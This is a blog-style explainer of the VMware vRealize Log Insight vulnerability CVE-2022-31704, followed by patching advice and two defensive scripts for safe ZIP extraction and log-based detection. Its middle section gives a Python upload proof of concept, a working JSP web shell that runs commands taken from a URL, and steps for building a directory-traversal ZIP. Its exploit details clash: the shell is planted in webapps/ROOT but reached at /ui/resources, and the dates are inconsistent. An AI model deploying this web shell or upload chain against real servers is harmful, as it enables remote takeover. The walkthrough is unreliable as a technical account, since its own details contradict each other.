CVE-2022-31704 - Remote Code Execution in VMware vRealize Log Insight Explained
In 2022, cybersecurity researchers discovered a critical vulnerability, CVE-2022-31704, in VMware vRealize Log Insight (since renamed Aria Operations for Logs). This post breaks down how this "broken access control" flaw works, shows how an attacker could use it to take over servers, and links to essential references. We'll keep things simple but technically accurate, with code examples you won't find everywhere else.
What is CVE-2022-31704?
VMware vRealize Log Insight collects, analyzes, and manages log data across a network, especially in large IT environments. In June 2022, a bug was found, CVE-2022-31704, that let attackers write files into protected locations *without* needing an account. If they succeed, attackers can *control* the software and the server it runs on.
This is called a Broken Access Control vulnerability: the software failed to stop outsiders from accessing sensitive areas that only admins should touch.
* CVE Page: NIST CVE-2022-31704
* VMware Advisory: VMSA-2023-0001
How Does the Attack Work?
Most web apps block access to admin-level features unless you're logged in. With CVE-2022-31704, however, you can trick the server into letting you *write* (upload) files anywhere, including the folders it serves scripts from!
That means anyone who can reach the appliance over the network can run their code on your server.
This happens because of a problem with how Log Insight checks user permissions in the file upload functions.
Original Discovery & References
- Horizon3.ai original research & exploitation details
- GitHub Proof-of-Concept Exploit
- VMware’s Security Patch Announcement
Exploit Details: Step by Step
Let’s simplify how an attacker might exploit CVE-2022-31704.
1. Find the Vulnerable Endpoint
Log Insight exposes vulnerable endpoints such as /api/v1/diag/prepare-support-bundle and /api/v2/diag/telemetry/photon/support-bundle.
2. Abuse Broken Access Control
No authentication is needed; you POST a specially crafted ZIP file to the endpoint. Log Insight will unpack that ZIP anywhere you tell it.
3. Plant the Payload
If you drop a web shell in a directory that the web server runs scripts from (for example, /usr/lib/loginsight/application/3rd_party/apache-tomcat/webapps/ROOT/), you can execute your code just by visiting its URL.
PoC (Proof-of-Concept) Python Script
Below is a simplified code snippet. Do not use this on servers you do not own!
import requests
# Target URL (port and endpoint as named above)
target_url = "http://TARGET:9543/api/v2/diag/telemetry/photon/support-bundle"
# Prepare the ZIP file that carries the JSP web shell; the handle is closed after the request
with open('exploit.zip', 'rb') as zip_file:
    files = {'file': zip_file}
    # Send ZIP to the vulnerable endpoint
    r = requests.post(target_url, files=files, verify=False)
print("[+] Upload response:", r.status_code)
# After this, you can access the web shell:
# http://TARGET:9543/ui/resources/your-shell.jsp
Before running this, you’d build a ZIP file containing a malicious .jsp file, with a path in the ZIP that drops it into the web server folder.
Malicious JSP Example: shell.jsp
<% if ("secret".equals(request.getParameter("key"))) {
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
while((a=in.read())!=-1) out.print((char)a);
} %>
Visiting /ui/resources/shell.jsp?key=secret&cmd=id would run the id command on the server.
Create exploit.zip
- Contains shell.jsp, stored as ../../ui/resources/shell.jsp (using directory traversal)
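The root cause described above is an unpacker that writes archive entries wherever their names point. The check a safe unpacker applies is shown here as an added example (written for this post, not code from the page, from Horizon3.ai or from VMware): every entry name is joined to the destination directory, fully resolved, and rejected if it lands outside that directory. The archives and the `/tmp/bundle` destination are constructed test values.

```python
import io
import os
import tempfile
import zipfile


def entry_escapes(dest_dir: str, entry_name: str) -> bool:
    """Return True if an archive entry would land outside dest_dir.

    The entry name is joined to the destination and fully resolved, then the
    resolved path must still start with the destination root. This catches
    '../' hops, absolute names and backslash-separated names alike.
    """
    dest_root = os.path.realpath(dest_dir)
    normalised = entry_name.replace("\\", "/")
    target = os.path.realpath(os.path.join(dest_root, normalised))
    return os.path.commonpath([dest_root, target]) != dest_root


def find_unsafe_entries(zip_bytes: bytes, dest_dir: str = "/tmp/bundle") -> list:
    """List every entry name in the archive that would escape dest_dir."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist() if entry_escapes(dest_dir, name)]


def safe_extract(zip_bytes: bytes, dest_dir: str) -> list:
    """Unpack the archive only if every entry stays inside dest_dir.

    The whole archive is refused on the first bad entry: partially unpacking
    a hostile bundle is no better than refusing it outright.
    """
    unsafe = find_unsafe_entries(zip_bytes, dest_dir)
    if unsafe:
        raise ValueError(f"refusing archive, traversal entries: {unsafe}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest_dir)
        return zf.namelist()


def try_extract(zip_bytes: bytes) -> tuple:
    """Attempt safe_extract into a fresh temporary directory.

    Returns (True, extracted_names) or (False, offending_names).
    """
    with tempfile.TemporaryDirectory() as tmp:
        try:
            return True, safe_extract(zip_bytes, tmp)
        except ValueError:
            return False, find_unsafe_entries(zip_bytes, tmp)


def build_sample_zip(entries: dict) -> bytes:
    """Build an in-memory archive from {name: text}; constructed test data only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: a well-formed bundle and one carrying a traversal entry.
CLEAN_ZIP = build_sample_zip({"bundle/logs/app.log": "ok"})
TRAVERSAL_ZIP = build_sample_zip({
    "bundle/logs/app.log": "ok",
    "../../escaped.txt": "would land two levels above the extraction directory",
})

if __name__ == "__main__":
    print("clean:", try_extract(CLEAN_ZIP))
    print("traversal:", try_extract(TRAVERSAL_ZIP))
```

Python's own `extractall` already strips `..` components, so the explicit `entry_escapes` check is there to show the rule in a language-independent form: resolve first, then compare against the destination root, and never trust the entry name as written.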
Who is Affected?
Any unpatched VMware vRealize Log Insight (8.8 and older). VMware released a patch; if you still run an old version, you are *at risk*.
Patch now:
Detection
Look for unusual file uploads or requests to the endpoints named above. Monitor for unexpected JSP files in webapps directories, as well as strange commands in server logs.
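The two signals named above, requests to the support-bundle endpoints and JSP files that should not be in the webapps tree, are turned into working detection logic in this added example (written for this post, not code from the page or from VMware). It assumes the web server writes access logs in the common combined format, that the legitimate JSP file names are supplied as an allowlist (`known_jsp`), and it runs over constructed sample lines and a constructed directory listing rather than real appliance data.

```python
import os
import re
from urllib.parse import urlsplit

# Endpoints the post names; a POST here is the first thing to look for.
SUSPECT_ENDPOINTS = {
    "/api/v1/diag/prepare-support-bundle",
    "/api/v2/diag/telemetry/photon/support-bundle",
}

# Combined/common access-log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_access_line(line: str):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = urlsplit(rec["target"]).path  # drop the query string
    return rec


def classify(rec: dict, known_jsp) -> str:
    """Return a reason string if the request deserves an alert, else ''."""
    if rec["method"] == "POST" and rec["path"] in SUSPECT_ENDPOINTS:
        return "POST to support-bundle upload endpoint"
    if rec["path"].endswith(".jsp") and os.path.basename(rec["path"]) not in known_jsp:
        return "request to JSP outside the known set"
    return ""


def detect(lines, known_jsp=frozenset()) -> list:
    """Run classify over raw log lines; return one alert dict per hit."""
    alerts = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        reason = classify(rec, known_jsp)
        if reason:
            alerts.append({"client": rec["client"], "ts": rec["ts"],
                           "path": rec["path"], "status": rec["status"],
                           "reason": reason})
    return alerts


def unexpected_jsp(file_paths, known_jsp=frozenset()) -> list:
    """Filter file paths down to .jsp files whose basename is not in the allowlist."""
    return [p for p in file_paths
            if p.endswith(".jsp") and os.path.basename(p) not in known_jsp]


def scan_webapps(root: str, known_jsp=frozenset()) -> list:
    """Walk a webapps directory on disk and apply unexpected_jsp to what is found."""
    found = [os.path.join(d, f) for d, _, files in os.walk(root) for f in files]
    return unexpected_jsp(found, known_jsp)


# Constructed sample lines (not real appliance logs), in combined format.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jan/2023:10:01:02 +0000] "POST /api/v2/diag/telemetry/photon/support-bundle HTTP/1.1" 200 512 "-" "python-requests/2.28.1"
10.0.0.9 - - [26/Jan/2023:10:01:30 +0000] "GET /login HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Jan/2023:10:02:10 +0000] "GET /ui/resources/shell.jsp?key=secret&cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"
this line is not an access-log record
"""

# Constructed listing of a Tomcat ROOT webapp; index.jsp is assumed legitimate.
SAMPLE_FILES = [
    "/webapps/ROOT/index.jsp",
    "/webapps/ROOT/WEB-INF/web.xml",
    "/webapps/ROOT/shell.jsp",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines(), known_jsp={"index.jsp"}):
        print(alert)
    print(unexpected_jsp(SAMPLE_FILES, known_jsp={"index.jsp"}))
```

Both alerts in the sample come from the same client a minute apart: an upload to the bundle endpoint followed by a hit on a JSP nobody deployed. Correlating the two by client address and time is what separates a real intrusion from a support engineer generating a bundle, so keep the client and timestamp in the alert rather than just the path.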
Protect Yourself
- Update Log Insight/Aria Operations for Logs immediately.
Final Notes
CVE-2022-31704 is a typical example of the worst kind of web app mistake: letting anyone modify files meant only for trusted admins. If you're running any VMware appliances, make sure they’re up-to-date, and always restrict who can access them—especially over the internet.
References for further reading
- NIST CVE summary
- Horizon3.ai Technical Analysis
- VMware Advisory
*Stay safe. Patch your software, and keep learning!*
Timeline
Published on: 01/26/2023 21:15:00 UTC
Last modified on: 02/01/2023 16:57:00 UTC